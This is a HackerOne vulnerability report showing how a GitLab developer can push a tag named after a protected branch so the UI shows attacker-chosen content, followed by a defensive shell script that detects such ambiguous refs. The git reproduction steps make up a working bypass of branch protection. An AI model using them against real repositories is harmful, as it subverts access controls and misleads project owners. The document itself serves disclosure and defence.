An attacker is able to commit to tags with the same name as protected branches, and in many areas GitLab treats the tag as a branch (ambiguous git ref)
HackerOne report #1947917 by js_noob
on 2023-04-14, assigned to @greg:
Report
Summary
Hello team, this is a report to bypass the fix that was introduced in this issue. The fix was introduced to block any attacker from creating tags having the name of the default branch, however, an attacker can still create tags having the name of any protected branch.
Steps to reproduce

As an owner:

1. Create a new project.
2. Create a new branch called `protected`.
3. Protect that branch and don't allow anyone to push changes to it (Settings => Repository => Protected branches).
4. Add a developer to that project.

As the developer:

5. Clone the project locally:
   ```
   git clone https:...
   ```
6. Check out the protected branch:
   ```
   git fetch origin protected
   git checkout protected
   ```
7. Create a new branch with the name `new-feature`:
   ```
   git checkout -b 'new-feature'
   ```
8. Make any change to any file.
9. Commit and push the `new-feature` branch:
   ```
   git add .
   git commit -m 'new-feature'
   git push origin HEAD
   ```
10. Grab the hash of the final commit using the following command:
    ```
    git rev-parse HEAD
    ```
11. Switch back to the protected branch:
    ```
    git checkout protected
    ```
12. Create a tag named `protected` pointing to the latest commit of the `new-feature` branch:
    ```
    git tag protected HASH_FROM_STEP_10
    ```
13. Push the tags to the remote:
    ```
    git push origin --tags
    ```
14. Remove the `new-feature` branch from the remote:
    ```
    git push -d origin 'new-feature'
    ```

As the owner:

15. From the UI, navigate to https://gitlab.com/GROUP/PROJECT/-/tree/protected and verify that the changes are shown there.
Video/POC

`bandicam_2023-04-14_22-48-35-879.mp4`
Impact
An attacker is able to change the content of any non-default protected branch file by pushing a tag with the protected branch name.
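A defender-side check for the ambiguous-ref condition described above, added here as an example and not part of the report or of GitLab's own code. It reads a ref listing in the shape produced by `git for-each-ref --format='%(refname)'`, reports every name that exists both as a branch and as a tag, and shows a hypothetical pre-receive style guard that refuses a new tag whose name matches an existing branch; the sample ref list is constructed.

```shell
#!/bin/sh
# Constructed sample listing, in the format of
#   git for-each-ref --format='%(refname)'
# It contains the collision from the report: a branch and a tag both named "protected".
sample_refs() {
    printf '%s\n' \
        refs/heads/main \
        refs/heads/protected \
        refs/tags/protected \
        refs/tags/v1.0
}

# Read one fully-qualified refname per line on stdin and print each short name
# that is present under both refs/heads/ and refs/tags/ (an ambiguous ref).
find_ambiguous_refs() {
    awk '
        /^refs\/heads\// { heads[substr($0, 12)] = 1 }   # strip "refs/heads/" (11 chars)
        /^refs\/tags\//  { tags[substr($0, 11)]  = 1 }   # strip "refs/tags/"  (10 chars)
        END { for (n in heads) if (n in tags) print n }
    ' | sort
}

# Hypothetical server-side guard: $1 is the refname being created, stdin is the
# list of refs that already exist. Exit 1 when a tag would shadow a branch,
# so a hook can reject the push before the tag lands in the repository.
reject_shadowing_tag() {
    ref="$1"
    case "$ref" in
        refs/tags/*)
            name="${ref#refs/tags/}"
            if grep -qx "refs/heads/$name"; then
                echo "rejected: tag '$name' would shadow branch '$name'" >&2
                return 1
            fi
            ;;
    esac
    return 0
}
```

Running `sample_refs | find_ambiguous_refs` on the constructed listing prints `protected`, the name a GitLab `/-/tree/<name>` URL would resolve ambiguously.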